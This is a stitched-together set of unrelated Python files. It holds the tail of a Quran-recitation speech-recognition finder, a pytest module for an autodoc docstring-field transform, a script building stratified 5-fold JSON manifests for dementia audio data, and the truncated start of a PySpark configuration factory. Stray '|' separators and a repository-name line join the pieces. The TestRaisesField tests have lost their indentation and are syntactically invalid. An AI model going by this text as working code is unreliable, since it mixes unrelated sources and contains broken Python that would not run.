            approximatedText = self.asr.recognizeGoogle(filePath, expected, duration)
            if(not approximatedText):
                print("ASR returns None @findOnPage")
                break
            results, locations = self.searchEngine.search(approximatedText, limit=1)  # TODO: narrow down the search documents here
            if(len(results) == 0 or len(locations) == 0):
                expected += shift if increasing else -shift
                continue
            bestAya = locations[0]
            currentAya = bestAya['index']
            currentSura = bestAya['sura']
            print("sura, aya:", currentSura, currentAya, "and shift=", shift, "we are in", expected)
        return bestAya, expected
# this is because first 3 ayat of a chapter may be so long or so short. so we want a dynamic mapping that
# tell the first 3 sentences of each chapter ends in which aya index
# Consumed by Finder.findOnPage via chaptersMaxAya[chapterIndex - 1].
chaptersMaxAya = [  # index is chapter index in zero based.. value is max aya index that gives 3 sentences
    4, 3, 3, 1, 1, 1, 2, 1, 2, 2, 3, 3, 2, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3,
]
if __name__ == "__main__":
    # Manual smoke test: locate chapter beginnings inside one recorded
    # recitation segment (seconds 64..1541 of the given WAV file).
    # Fix: removed a stray trailing "|" artifact that made the final line
    # syntactically invalid.
    finder = Finder()
    chapters = finder.find("C:\\Data\\القران كامل\\4\\ZOOM0002.WAV", 64, 1541)
    print(chapters)
# Copyright 2018 Luddite Labs Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from autodoc.python.rst.transforms.collect_fields import CollectInfoFields
from autodoc.report import Codes
# These param will be loaded by the fixtures (assert_py_doc, parse_py_doc).
# CollectInfoFields is the docstring transform under test in this module.
docstring_transforms = [CollectInfoFields]
# Test: convert :param: and :type: to <param_field> and move them to the
# doc parts.
class TestParamField:
    """Tests collecting ``:param:``/``:type:`` fields into the 'params' doc section."""
    # NOTE(review): the embedded sample docstrings depend on RST indentation
    # (continuation lines, field blocks); verify the in-string formatting
    # against the original file.

    # Test: parameters and their types.
    def test_fields(self, parse_py_doc):
        env = parse_py_doc(
            text="""
This is an ordinary paragraph.
:parameter:
:type type_wrong_place: xxx
:param no_type: Lorem ipsum dolor sit amet.
:param type_wrong_place: 123
:param str with_type: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
:parameter with_separate_type: Ut enim ad minim veniam,
quis nostrud exercitation.
Paragraph 2.
:type with_separate_type: integer or None
:type with_separate_type: string
:type non_exist: str
:param underscore_name_: Such name parsed as ``<reference>_`` RST
construction. But we should handle it as a plain text.
This is a paragraph after the field list.
.. seealso:: Another function.
.. note:: Lorem ipsum dolor sit amet, consectetur adipiscing elit.
"""
        )
        doc = env['definition'].doc_block.document
        assert hasattr(doc, 'field_sections')
        section = doc.field_sections.get('params')
        assert section is not None
        assert len(section) == 5
        # Parameter no_type.
        param = section[0]
        assert param.get('name') == 'no_type'
        assert param.get('type') is None
        assert param.get('orig_field_tag') == 'param'
        assert len(param) == 1
        assert len(param[0]) == 1
        assert param[0][0].astext() == 'Lorem ipsum dolor sit amet.'
        # Parameter type_wrong_place.
        param = section[1]
        assert param.get('name') == 'type_wrong_place'
        assert param.get('type') == ['xxx']
        assert param.get('orig_field_tag') == 'param'
        assert len(param) == 1
        assert len(param[0]) == 1
        # Parameter with_type.
        param = section[2]
        assert param.get('name') == 'with_type'
        assert param.get('type') == ['str']
        assert param.get('orig_field_tag') == 'param'
        assert len(param) == 1
        assert len(param[0]) == 1
        # Parameter with_separate_type.
        param = section[3]
        assert param.get('name') == 'with_separate_type'
        assert param.get('type') == ['integer or None', 'string']
        assert param.get('orig_field_tag') == 'parameter'
        assert len(param) == 1
        assert len(param[0]) == 2
        # Parameter underscore_name_.
        param = section[4]
        assert param.get('name') == 'underscore_name_'
        assert param.get('type') is None
        assert param.get('orig_field_tag') == 'param'
        assert len(param) == 1
        assert len(param[0]) == 1

    # Test: report messages.
    def test_report(self, parse_py_doc):
        env = parse_py_doc(
            add_report=True,
            text="""
This is an ordinary paragraph.
:parameter:
:type type_wrong_place: xxx
:param no_type: Lorem ipsum dolor sit amet.
:param no_type: Lorem ipsum dolor sit amet.
:param type_wrong_place: 123
:param str with_type: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
:parameter with_separate_type: Ut enim ad minim veniam,
quis nostrud exercitation.
Paragraph 2.
:type with_separate_type: integer or None
:type with_separate_type: string
:type non_exist: str
:type: str
:type with_separate_type: yyy
:param xxx: 123
:type xxx: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
"""
        )
        doc = env['definition'].doc_block.document
        assert hasattr(doc, 'field_sections')
        report = env.get('reporter').report
        assert isinstance(report, list)
        assert len(report) == 5
        for i, item in enumerate(report):
            assert len(item) == 8, 'Report at %d.' % i
        report.sort()
        path, domain, line, col, func_name, level, code, msg = report[0]
        assert path == '<string>'  # conftest setup this.
        assert domain == 'python'
        # NOTE: currently we drop position in the docstring
        # and use position of the ref (function, class).
        assert line == 0
        assert col == 0
        assert func_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.COMPLEX
        assert msg == 'Type specification is too complex [:type xxx:]'
        path, domain, line, col, func_name, level, code, msg = report[1]
        assert path == '<string>'
        assert domain == 'python'
        assert line == 0
        assert col == 0
        assert func_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.DUPLICATE
        assert msg == 'Duplicate field [:param no_type:]'
        # This check happens before line 16 checks.
        path, domain, line, col, func_name, level, code, msg = report[2]
        assert path == '<string>'
        assert domain == 'python'
        assert line == 0
        assert col == 0
        assert func_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.INCORRECT
        assert msg == 'Incorrect signature [:parameter:]'
        path, domain, line, col, func_name, level, code, msg = report[3]
        assert path == '<string>'
        assert domain == 'python'
        assert line == 0
        assert col == 0
        assert func_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.INCORRECT
        assert msg == 'Incorrect signature [:type:]'
        path, domain, line, col, func_name, level, code, msg = report[4]
        assert path == '<string>'
        assert domain == 'python'
        assert line == 0
        assert col == 0
        assert func_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.UNKNOWN
        assert msg == 'Type for unknown parameter [non_exist]'

    # Test: remove detected and invalid fields
    def test_remove(self, assert_py_doc):
        assert_py_doc(
            text="""
This is an ordinary paragraph.
:parameter:
:type type_wrong_place: xxx
:param no_type: Lorem ipsum dolor sit amet.
:param no_type: Lorem ipsum dolor sit amet.
:param type_wrong_place: 123
:param str with_type: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
:parameter with_separate_type: Ut enim ad minim veniam,
quis nostrud exercitation.
Paragraph 2.
:type with_separate_type: integer or None
:type non_exist: str
:type: str
:type with_separate_type: yyy
:param xxx: 123
:type xxx: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
""",
            expected="""This is an ordinary paragraph."""
        )

    # Test: if specify type fields without params ones, then it will not create
    # params field section.
    # See CollectInfoFields.after_process().
    def test_wrong_section(self, parse_py_doc):
        env = parse_py_doc(
            text="""
This is an ordinary paragraph.
:type noparam: xxx
"""
        )
        doc = env['definition'].doc_block.document
        assert hasattr(doc, 'field_sections')
        report = env.get('reporter').report
        assert isinstance(report, list)
        assert len(report) == 1
        for i, item in enumerate(report):
            assert len(item) == 8, 'Report at %d.' % i
        report.sort()
        path, domain, line, col, func_name, level, code, msg = report[0]
        assert path == '<string>'
        assert domain == 'python'
        assert line == 0
        assert col == 0
        assert func_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.UNKNOWN
        assert msg == 'Type for unknown parameter [noparam]'
# Test: :ivar:, :vartype:.
class TestVarField:
    """Tests collecting ``:ivar:``/``:vartype:`` fields into the 'attributes' doc section."""
    # NOTE(review): the embedded sample docstring depends on RST indentation;
    # verify the in-string formatting against the original file.

    # Test: parameters and their types.
    def test_fields(self, parse_py_doc):
        env = parse_py_doc(
            text="""
This is an ordinary paragraph.
:ivar:
:vartype type_wrong_place: xxx
:ivar no_type: Lorem ipsum dolor sit amet.
:ivar type_wrong_place: 123
:ivar str with_type: 321
:ivar with_separate_type: Ut enim ad minim veniam,
:vartype with_separate_type: integer or None
"""
        )
        doc = env['definition'].doc_block.document
        assert hasattr(doc, 'field_sections')
        section = doc.field_sections.get('attributes')
        assert section is not None
        assert len(section) == 4
        # Parameter no_type.
        param = section[0]
        assert param.get('name') == 'no_type'
        assert param.get('type') is None
        assert param.get('orig_field_tag') == 'ivar'
        assert len(param) == 1
        assert len(param[0]) == 1
        assert param[0][0].astext() == 'Lorem ipsum dolor sit amet.'
        # Parameter type_wrong_place.
        param = section[1]
        assert param.get('name') == 'type_wrong_place'
        assert param.get('type') == ['xxx']
        assert param.get('orig_field_tag') == 'ivar'
        assert len(param) == 1
        assert len(param[0]) == 1
        # Parameter with_type.
        param = section[2]
        assert param.get('name') == 'with_type'
        assert param.get('type') == ['str']
        assert param.get('orig_field_tag') == 'ivar'
        assert len(param) == 1
        assert len(param[0]) == 1
        assert param[0][0].astext() == '321'
        # Parameter with_separate_type.
        param = section[3]
        assert param.get('name') == 'with_separate_type'
        assert param.get('type') == ['integer or None']
        assert param.get('orig_field_tag') == 'ivar'
        assert len(param) == 1
        assert len(param[0]) == 1
# Test: convert :keyword: and :kwtype: to <keyword_field> and move them to the
# doc parts.
class TestKwField:
    """Tests collecting ``:keyword:``/``:kwtype:`` fields into the 'keyword' doc section."""
    # NOTE(review): the embedded sample docstrings depend on RST indentation;
    # verify the in-string formatting against the original file.

    # Test: parameters and their types.
    def test_fields(self, parse_py_doc):
        env = parse_py_doc(
            text="""
This is an ordinary paragraph.
:keyword:
:kwtype type_wrong_place: xxx
:keyword no_type: Lorem ipsum dolor sit amet.
:keyword type_wrong_place: 123
:keyword str with_type: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
:keyword with_separate_type: Ut enim ad minim veniam,
quis nostrud exercitation.
Paragraph 2.
:kwtype with_separate_type: integer or None
:kwtype with_separate_type: string
:kwtype non_exist: str
This is a paragraph after the field list.
"""
        )
        doc = env['definition'].doc_block.document
        assert hasattr(doc, 'field_sections')
        section = doc.field_sections.get('keyword')
        assert section is not None
        assert len(section) == 4
        # Parameter no_type.
        param = section[0]
        assert param.get('name') == 'no_type'
        assert param.get('type') is None
        assert param.get('orig_field_tag') == 'keyword'
        assert len(param) == 1
        assert len(param[0]) == 1
        assert param[0][0].astext() == 'Lorem ipsum dolor sit amet.'
        # Parameter type_wrong_place.
        param = section[1]
        assert param.get('name') == 'type_wrong_place'
        assert param.get('type') == ['xxx']
        assert param.get('orig_field_tag') == 'keyword'
        assert len(param) == 1
        assert len(param[0]) == 1
        # Parameter with_type.
        param = section[2]
        assert param.get('name') == 'with_type'
        assert param.get('type') == ['str']
        assert param.get('orig_field_tag') == 'keyword'
        assert len(param) == 1
        assert len(param[0]) == 1
        # Parameter with_separate_type.
        param = section[3]
        assert param.get('name') == 'with_separate_type'
        assert param.get('type') == ['integer or None', 'string']
        assert param.get('orig_field_tag') == 'keyword'
        assert len(param) == 1
        assert len(param[0]) == 2

    # Test: report messages.
    def test_report(self, parse_py_doc):
        env = parse_py_doc(
            add_report=True,
            text="""
This is an ordinary paragraph.
:keyword:
:kwtype type_wrong_place: xxx
:keyword no_type: Lorem ipsum dolor sit amet.
:keyword no_type: Lorem ipsum dolor sit amet.
:keyword type_wrong_place: 123
:keyword str with_type: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
:keyword with_separate_type: Ut enim ad minim veniam,
quis nostrud exercitation.
Paragraph 2.
:kwtype with_separate_type: integer or None
:kwtype with_separate_type: string
:kwtype non_exist: str
:kwtype: str
:kwtype with_separate_type: yyy
:keyword xxx: 123
:kwtype xxx: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
"""
        )
        doc = env['definition'].doc_block.document
        assert hasattr(doc, 'field_sections')
        report = env.get('reporter').report
        assert isinstance(report, list)
        assert len(report) == 5
        for i, item in enumerate(report):
            assert len(item) == 8, 'Report at %d.' % i
        report.sort()
        path, domain, line, col, ref_name, level, code, msg = report[0]
        assert path == '<string>'  # conftest setup this.
        assert domain == 'python'
        # NOTE: currently we drop position in the docstring
        # and use position of the ref (function, class).
        assert line == 0
        assert col == 0
        assert ref_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.COMPLEX
        assert msg == 'Type specification is too complex [:kwtype xxx:]'
        path, domain, line, col, ref_name, level, code, msg = report[1]
        assert path == '<string>'
        assert domain == 'python'
        assert line == 0
        assert col == 0
        assert ref_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.DUPLICATE
        assert msg == 'Duplicate field [:keyword no_type:]'
        # This check happens before line 16 checks.
        path, domain, line, col, ref_name, level, code, msg = report[2]
        assert path == '<string>'
        assert domain == 'python'
        assert line == 0
        assert col == 0
        assert ref_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.INCORRECT
        assert msg == 'Incorrect signature [:keyword:]'
        path, domain, line, col, ref_name, level, code, msg = report[3]
        assert path == '<string>'
        assert domain == 'python'
        assert line == 0
        assert col == 0
        assert ref_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.INCORRECT
        assert msg == 'Incorrect signature [:kwtype:]'
        path, domain, line, col, ref_name, level, code, msg = report[4]
        assert path == '<string>'
        assert domain == 'python'
        assert line == 0
        assert col == 0
        assert ref_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.UNKNOWN
        assert msg == 'Type for unknown parameter [non_exist]'

    # Test: remove detected and invalid fields
    def test_remove(self, assert_py_doc):
        assert_py_doc(
            text="""
This is an ordinary paragraph.
:keyword:
:kwtype type_wrong_place: xxx
:keyword no_type: Lorem ipsum dolor sit amet.
:keyword no_type: Lorem ipsum dolor sit amet.
:keyword type_wrong_place: 123
:keyword str with_type: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
:keyword with_separate_type: Ut enim ad minim veniam,
quis nostrud exercitation.
Paragraph 2.
:kwtype with_separate_type: integer or None
:kwtype with_separate_type: string
:kwtype non_exist: str
:kwtype: str
:kwtype with_separate_type: yyy
:keyword xxx: 123
:kwtype xxx: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
""",
            expected="""This is an ordinary paragraph."""
        )
# Test: convert :return: and :rtype: to <returns_field> and move them to the
# doc parts.
class TestReturnField:
    """Tests collecting ``:return:``/``:rtype:`` fields into the 'returns' doc section."""
    # NOTE(review): the embedded sample docstrings depend on RST indentation;
    # verify the in-string formatting against the original file.

    def test_fields(self, parse_py_doc):
        env = parse_py_doc(
            text="""
This is an ordinary paragraph.
:return bla bla: Hz
:returns: the message id 1
:return: the message id 2
:rtype: int
:rtype: char
Ut enim ad minim veniam, quis nostrud.
"""
        )
        doc = env['definition'].doc_block.document
        assert hasattr(doc, 'field_sections')
        section = doc.field_sections.get('returns')
        assert section is not None
        assert len(section) == 3
        ret = section[0]
        assert ret.get('type') is None
        assert ret.get('orig_field_tag') == 'returns'
        assert len(ret) == 1
        assert len(ret[0]) == 1
        assert ret[0][0].astext() == 'the message id 1'
        ret = section[1]
        assert ret.get('type') == ['int']
        assert ret.get('orig_field_tag') == 'return'
        assert len(ret) == 1
        assert len(ret[0]) == 1
        assert ret[0][0].astext() == 'the message id 2'
        ret = section[2]
        assert ret.get('type') == ['char']
        assert ret.get('orig_field_tag') == 'returns'
        assert len(ret) == 1
        assert len(ret[0]) == 0

    # Test: report messages.
    def test_report(self, parse_py_doc):
        env = parse_py_doc(
            add_report=True,
            text="""
This is an ordinary paragraph.
:return bla bla: Hz
:return: the message id 2
:return:
:rtype: int, :obj:`my`
:rtype: char
:rtype bla: char
:rtype: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
:rtype: Line 1
Line 2.
Ut enim ad minim veniam, quis nostrud.
"""
        )
        doc = env['definition'].doc_block.document
        assert hasattr(doc, 'field_sections')
        report = env.get('reporter').report
        assert isinstance(report, list)
        assert len(report) == 5
        for i, item in enumerate(report):
            assert len(item) == 8, 'Report at %d.' % i
        path, domain, line, col, ref_name, level, code, msg = report[0]
        assert path == '<string>'  # conftest setup this.
        assert domain == 'python'
        # NOTE: currently we drop position in the docstring
        # and use position of the ref (function, class).
        assert line == 0
        assert col == 0
        assert ref_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.INCORRECT
        assert msg == 'Incorrect signature [:return:]'
        path, domain, line, col, ref_name, level, code, msg = report[1]
        assert path == '<string>'
        assert domain == 'python'
        assert line == 0
        assert col == 0
        assert ref_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.EMPTY
        assert msg == 'Empty content [:return:]'
        path, domain, line, col, ref_name, level, code, msg = report[2]
        assert path == '<string>'
        assert domain == 'python'
        assert line == 0
        assert col == 0
        assert ref_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.INCORRECT
        assert msg == 'Incorrect signature [:rtype:]'
        path, domain, line, col, ref_name, level, code, msg = report[3]
        assert path == '<string>'
        assert domain == 'python'
        assert line == 0
        assert col == 0
        assert ref_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.COMPLEX
        assert msg == 'Type specification is too complex [:rtype:]'
        path, domain, line, col, ref_name, level, code, msg = report[4]
        assert path == '<string>'
        assert domain == 'python'
        assert line == 0
        assert col == 0
        assert ref_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.COMPLEX
        assert msg == 'Type specification is too complex [:rtype:]'

    # Test: remove detected and invalid fields
    def test_remove(self, assert_py_doc):
        assert_py_doc(
            text="""
This is an ordinary paragraph.
:return bla bla: Hz
:return: the message id 2
:return:
:rtype: int
:rtype: char
:rtype bla: char
:rtype: Do eiusmod tempor incididunt ut labore
et dolore magna aliqua.
Ut enim ad minim veniam, quis nostrud.
""",
            expected="""
This is an ordinary paragraph.
Ut enim ad minim veniam, quis nostrud.
"""
        )
# Test: convert :raises: rtype: to <raises_field> and move them to the
# doc parts.
class TestRaisesField:
def test_fields(self, parse_py_doc):
env = parse_py_doc(
text="""
This is an ordinary paragraph.
:raises:
:raises ValueError: if the message_body exceeds 160
:raise TypeError: if the message_body is not a basestring
:except RuntimeError:
:exception RuntimeError2:
Ut enim ad minim veniam, quis nostrud.
"""
)
doc = env['definition'].doc_block.document
assert hasattr(doc, 'field_sections')
section = doc.field_sections.get('raises')
assert section is not None
assert len(section) == 4
node = section[0]
assert node.get('type') == ['ValueError']
assert node.get('orig_field_tag') == 'raises'
assert len(node) == 1
assert len(node[0]) == 1
assert node[0][0].astext() == 'if the message_body exceeds 160'
node = section[1]
assert node.get('type') == ['TypeError']
assert node.get('orig_field_tag') == 'raise'
assert len(node) == 1
assert len(node[0]) == 1
assert node[0][0].astext() == 'if the message_body is not a basestring'
node = section[2]
assert node.get('type') == ['RuntimeError']
assert node.get('orig_field_tag') == 'except'
assert len(node) == 1
assert len(node[0]) == 0
node = section[3]
assert node.get('type') == ['RuntimeError2']
assert node.get('orig_field_tag') == 'exception'
assert len(node) == 1
assert len(node[0]) == 0
# Test: if :raises: contains multiple types (:raises Type1 Type2:) then
# generate multiple :raises: fields with single type.
def test_multiple(self, parse_py_doc):
env = parse_py_doc(
text="""
This is an ordinary paragraph.
:raises RuntimeError1 RuntimeError2: Generate multiple fields.
Ut enim ad minim veniam, quis nostrud.
"""
)
doc = env['definition'].doc_block.document
assert hasattr(doc, 'field_sections')
section = doc.field_sections.get('raises')
assert section is not None
assert len(section) == 2
node = section[0]
assert node.get('type') == ['RuntimeError1']
assert node.get('orig_field_tag') == 'raises'
assert len(node) == 1
assert len(node[0]) == 1
assert node[0][0].astext() == 'Generate multiple fields.'
node = section[1]
assert node.get('type') == ['RuntimeError2']
assert node.get('orig_field_tag') == 'raises'
assert len(node) == 1
assert len(node[0]) == 1
assert node[0][0].astext() == 'Generate multiple fields.'
    def test_report(self, parse_py_doc):
        # Malformed :raises:-family fields must each yield one report row:
        # missing type, missing description, and a multi-type signature.
        env = parse_py_doc(
            add_report=True,
            text="""
            This is an ordinary paragraph.
            :raises:
            :raises ValueError: if the message_body exceeds 160
            :raise TypeError: if the message_body is not a basestring
            :except RuntimeError:
            :exception RuntimeError2:
            :raises RuntimeError1 RuntimeError2: this is incorrect!
            Ut enim ad minim veniam, quis nostrud.
            """
        )
        doc = env['definition'].doc_block.document
        assert hasattr(doc, 'field_sections')
        report = env.get('reporter').report
        assert isinstance(report, list)
        assert len(report) == 3
        # Each report row is an 8-tuple.
        assert len(report[0]) == 8
        path, domain, line, col, ref_name, level, code, msg = report[0]
        assert path == '<string>'  # conftest setup this.
        assert domain == 'python'
        # NOTE: currently we drop position in the docstring
        # and use position of the ref (function, class).
        assert line == 0
        assert col == 0
        assert ref_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.MISSING
        assert msg == 'Type is missing [:raises:]'
        path, domain, line, col, ref_name, level, code, msg = report[1]
        assert path == '<string>'  # conftest setup this.
        assert domain == 'python'
        assert line == 0
        assert col == 0
        assert ref_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.MISSING
        assert msg == 'Description is missing [:raises:]'
        path, domain, line, col, ref_name, level, code, msg = report[2]
        assert path == '<string>'  # conftest setup this.
        assert domain == 'python'
        assert line == 0
        assert col == 0
        assert ref_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.INCORRECT
        assert msg == 'Incorrect signature [:raises:]'
    # Test: remove detected and invalid fields.
    def test_remove(self, assert_py_doc):
        # All :raises:-family fields (valid or not) are consumed; unrelated
        # fields such as :one: stay in the docstring.
        assert_py_doc(
            text="""
            This is an ordinary paragraph.
            :raises:
            :raises ValueError: if the message_body exceeds 160
            :raise TypeError: if the message_body is not a basestring
            :except RuntimeError:
            :exception RuntimeError2:
            :one:
            Ut enim ad minim veniam, quis nostrud.
            """,
            expected="""
            This is an ordinary paragraph.
            :one:
            Ut enim ad minim veniam, quis nostrud.
            """
        )
# Test: convert :Yields: <yields_field> and move them to the doc parts.
# Test: convert :Yields: <yields_field> and move them to the doc parts.
class TestYieldsField:
    """Tests for collecting :Yields: fields into the 'yields' doc section."""

    def test_fields(self, parse_py_doc):
        # Multi-paragraph and scalar :Yields: bodies are both collected.
        env = parse_py_doc(
            text="""
            This is an ordinary paragraph.
            :Yields: Quis nostrud exercitation ullamco. In voluptate velit esse
                cillum dolore eu fugiat nulla.
                Ut enim ad minim veniam.
            :Yields: 123
            :Yields:
            Ut enim ad minim veniam, quis nostrud.
            """
        )
        doc = env['definition'].doc_block.document
        assert hasattr(doc, 'field_sections')
        section = doc.field_sections.get('yields')
        assert section is not None
        # NOTE: empty :Yields: will be dropped.
        assert len(section) == 2
        node = section[0]
        assert node.get('orig_field_tag') == 'Yields'
        assert len(node) == 1
        assert len(node[0]) == 2
        # Text is normalized; the two paragraphs are separated by a blank line.
        assert node[0].astext() == ('Quis nostrud exercitation ullamco. '
                                    'In voluptate velit esse\ncillum '
                                    'dolore eu fugiat nulla.\n\nUt enim '
                                    'ad minim veniam.')
        node = section[1]
        assert node.get('orig_field_tag') == 'Yields'
        assert len(node) == 1
        assert len(node[0]) == 1
        assert node[0].astext() == '123'

    # Test: remove detected fields.
    def test_remove(self, assert_py_doc):
        # All :Yields: fields are stripped from the rendered docstring.
        assert_py_doc(
            text="""
            This is an ordinary paragraph.
            :Yields: Quis nostrud exercitation ullamco. In voluptate velit esse
                cillum dolore eu fugiat nulla.
                Ut enim ad minim veniam.
            :Yields: 123
            :Yields:
            Ut enim ad minim veniam, quis nostrud.
            """,
            expected="""
            This is an ordinary paragraph.
            Ut enim ad minim veniam, quis nostrud.
            """
        )

    def test_report(self, parse_py_doc):
        # An empty :Yields: and a :Yields <arg>: signature each produce one
        # report row.
        env = parse_py_doc(
            add_report=True,
            text="""
            This is an ordinary paragraph.
            :Yields: 123
            :Yields:
            :Yields 23: sds
            Ut enim ad minim veniam, quis nostrud.
            """
        )
        doc = env['definition'].doc_block.document
        assert hasattr(doc, 'field_sections')
        report = env.get('reporter').report
        assert isinstance(report, list)
        assert len(report) == 2
        assert len(report[0]) == 8
        path, domain, line, col, ref_name, level, code, msg = report[0]
        assert path == '<string>'  # conftest setup this.
        assert domain == 'python'
        # NOTE: currently we drop position in the docstring
        # and use position of the ref (function, class).
        assert line == 0
        assert col == 0
        assert ref_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.MISSING
        assert msg == 'Content is missing [:Yields:]'
        path, domain, line, col, ref_name, level, code, msg = report[1]
        assert path == '<string>'  # conftest setup this.
        assert domain == 'python'
        # NOTE: currently we drop position in the docstring
        # and use position of the ref (function, class).
        assert line == 0
        assert col == 0
        assert ref_name == 'test_func'
        assert level == logging.INFO
        assert code == Codes.INCORRECT
        assert msg == 'Incorrect signature [:Yields:]'
|
<reponame>jvel07/ast
# -*- coding: utf-8 -*-
# @Time : 10/19/20 5:15 AM
# @Author : <NAME>
# @Affiliation : Massachusetts Institute of Technology
# @Email : <EMAIL>
# @File : prep_esc50.py
import numpy as np
import json
import os
import zipfile
import pandas as pd
import wget
# label = np.loadtxt('/data/sls/scratch/yuangong/aed-pc/src/utilities/esc50_label.csv', delimiter=',', dtype='str')
# f = open("/data/sls/scratch/yuangong/aed-pc/src/utilities/esc_class_labels_indices.csv", "w")
# f.write("index,mid,display_name\n")
#
# label_set = []
# idx = 0
# for j in range(0, 5):
# for i in range(0, 10):
# cur_label = label[i][j]
# cur_label = cur_label.split(' ')
# cur_label = "_".join(cur_label)
# cur_label = cur_label.lower()
# label_set.append(cur_label)
# f.write(str(idx)+',/m/07rwj'+str(idx).zfill(2)+',\"'+cur_label+'\"\n')
# idx += 1
# f.close()
#
from sklearn.model_selection import train_test_split, StratifiedKFold
def get_immediate_subdirectories(a_dir):
    """Return the names of the direct (non-recursive) subdirectories of *a_dir*."""
    subdirs = []
    for entry in os.listdir(a_dir):
        if os.path.isdir(os.path.join(a_dir, entry)):
            subdirs.append(entry)
    return subdirs
def get_immediate_files(a_dir):
    """Return the names of the regular files directly inside *a_dir*."""
    files = []
    for entry in os.listdir(a_dir):
        if os.path.isfile(os.path.join(a_dir, entry)):
            files.append(entry)
    return files
# label_set = np.loadtxt('./data/dementia_class_labels_indices.csv', delimiter=',', dtype='str')
# label_map = {}
# for i in range(1, len(label_set)):
# label_map[eval(label_set[i][2])] = label_set[i][0]
# print(label_map)
# label_map = {'1': 'alzheimer', '2': 'mci', '3': 'hc'}
# fix bug: generate an empty directory to save json files.
# os.makedirs also creates a missing './data' parent; os.mkdir would fail.
if not os.path.exists('./data/datafiles'):
    os.makedirs('./data/datafiles')

# Root directory of the 16 kHz wav files referenced by the JSON manifests.
base_path_16k = '/home/egasj/data/audio/demencia94B-wav16k'
meta = pd.read_csv('dementia_meta.csv')
X = meta.loc[:, 'folder':'filename']
y = meta['label']


def _wav_entry(row):
    """Map a [folder, filename, label] row to a manifest dict.

    The label is encoded AudioSet-style as '/m/21rwj' + zero-padded label.
    """
    return {"wav": os.path.join(base_path_16k, row[1]),
            "labels": '/m/21rwj' + str(row[2]).zfill(2)}


# Stratified 5-fold split; write one train/eval JSON pair per fold.
skf = StratifiedKFold(n_splits=5)
for idx, (train_idx, test_idx) in enumerate(skf.split(X, y), start=1):
    # .copy() so adding the 'label' column mutates an independent frame,
    # not a slice view (avoids pandas SettingWithCopyWarning).
    X_train, X_test = X.iloc[train_idx].copy(), X.iloc[test_idx].copy()
    X_train['label'] = y.iloc[train_idx]
    X_test['label'] = y.iloc[test_idx]
    train = X_train.values.tolist()
    test = X_test.values.tolist()

    train_wav_list = [_wav_entry(val) for val in train]
    eval_wav_list = [_wav_entry(val) for val in test]

    with open('./data/datafiles/dementia_train_data_' + str(idx) + '.json', 'w') as f:
        json.dump({'data': train_wav_list}, f, indent=1)
    with open('./data/datafiles/dementia_eval_data_' + str(idx) + '.json', 'w') as f:
        json.dump({'data': eval_wav_list}, f, indent=1)

    # Manifest of all samples (train + eval of the current fold); rewritten
    # each fold, so the final file reflects the last fold's ordering, as before.
    total_data = [_wav_entry(val) for val in train + test]
    with open('data/dementia_total_data.json', 'w') as f:
        json.dump({'data': total_data}, f, indent=1)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, subprocess, shutil, sys, uuid, time, base64
from pyspark import SparkConf, SparkContext
from string import Formatter
import socket
try:
from kubernetes import config, client
from kubernetes.client.rest import ApiException
except ImportError:
pass
class SparkConfigurationFactory:
    """Build the Spark configuration helper matching the target cluster type."""

    def __init__(self, connector):
        # Notebook connector handed to the produced configuration object.
        self.connector = connector

    def create(self):
        """Instantiate the configuration selected by SPARK_CLUSTER_NAME.

        Returns None when the cluster type is not recognized.
        """
        cluster_name = os.environ.get('SPARK_CLUSTER_NAME', 'local')
        if cluster_name == 'local':
            return SparkLocalConfiguration(self.connector, cluster_name)
        return None
class SparkConfiguration(object):
    """Base class holding common Spark session configuration helpers."""

    def __init__(self, connector, cluster_name):
        # Cluster identifier (e.g. 'local') and the notebook connector.
        self.cluster_name = cluster_name
        self.connector = connector

    def get_cluster_name(self):
        """ Get cluster name """
        return self.cluster_name

    def get_spark_memory(self):
